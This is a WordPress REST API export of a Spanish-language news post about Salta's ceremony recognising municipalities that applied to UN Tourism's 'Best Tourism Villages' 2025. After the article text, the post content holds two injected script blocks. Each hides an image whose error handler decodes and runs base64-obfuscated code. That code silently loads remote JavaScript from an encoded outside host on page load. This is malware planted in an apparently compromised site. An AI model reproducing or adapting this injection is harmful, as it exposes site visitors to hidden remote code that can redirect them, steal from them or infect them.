{"id":5195,"date":"2025-05-28T10:26:18","date_gmt":"2025-05-28T13:26:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5195"},"modified":"2025-08-13T23:32:16","modified_gmt":"2025-08-14T02:32:16","slug":"reconocimiento-a-los-municipios-saltenos-postulados-a-best-tourism-villages-de-onu-turismo-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5195","title":{"rendered":"Reconocimiento a los municipios salte\u00f1os postulados a \u201cBest Tourism Villages\u201d de ONU Turismo 2025"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes realizar\u00e1 un acto para distinguir a las localidades que participaron de esta convocatoria internacional. Seclant\u00e1s, \u00fanico municipio salte\u00f1o seleccionado en la instancia nacional, recibir\u00e1 una menci\u00f3n especial.<\/em><\/strong><\/p>\n\n\n\n<p>Este&nbsp;jueves 29 de mayo a las 11, el Ministerio de Turismo y Deportes de Salta llevar\u00e1 a cabo un acto de presentaci\u00f3n y reconocimiento a los seis municipios salte\u00f1os que se postularon a la prestigiosa iniciativa \u201cBest Tourism Villages\u201d de ONU Turismo 2025.<\/p>\n\n\n\n<p>El evento tendr\u00e1 lugar en Resto Bar Adobe, Caseros 511, y contar\u00e1 con la participaci\u00f3n de autoridades provinciales, referentes tur\u00edsticos y representantes de los municipios de Seclant\u00e1s, Cachi, Guachipas, Los Toldos, Campamento Vespucio y Tartagal, quienes compartir\u00e1n su experiencia en esta convocatoria internacional.<\/p>\n\n\n\n<p>Durante el encuentro se har\u00e1 entrega de certificados de reconocimiento a todos los municipios participantes y una menci\u00f3n especial a Seclant\u00e1s, seleccionado por Argentina para representar al pa\u00eds en la instancia internacional del programa.<\/p>\n\n\n\n<p>Esta iniciativa de ONU Turismo busca visibilizar y premiar a pueblos rurales que promueven un turismo sostenible con fuerte arraigo cultural, patrimonial y comunitario. Salta fue la provincia con mayor n\u00famero de postulaciones a nivel nacional.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes realizar\u00e1 un acto para distinguir a las localidades que participaron de esta convocatoria internacional. Seclant\u00e1s, \u00fanico municipio salte\u00f1o seleccionado en la instancia nacional, recibir\u00e1 una menci\u00f3n especial. Este&nbsp;jueves 29 de mayo a las 11, el Ministerio de Turismo y Deportes de Salta llevar\u00e1 a cabo un acto de presentaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5196,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-5195","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5195"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5195"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5195\/revisions"}],"predecessor-version":[{"id":6481,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5195\/revisions\/6481"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5196"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}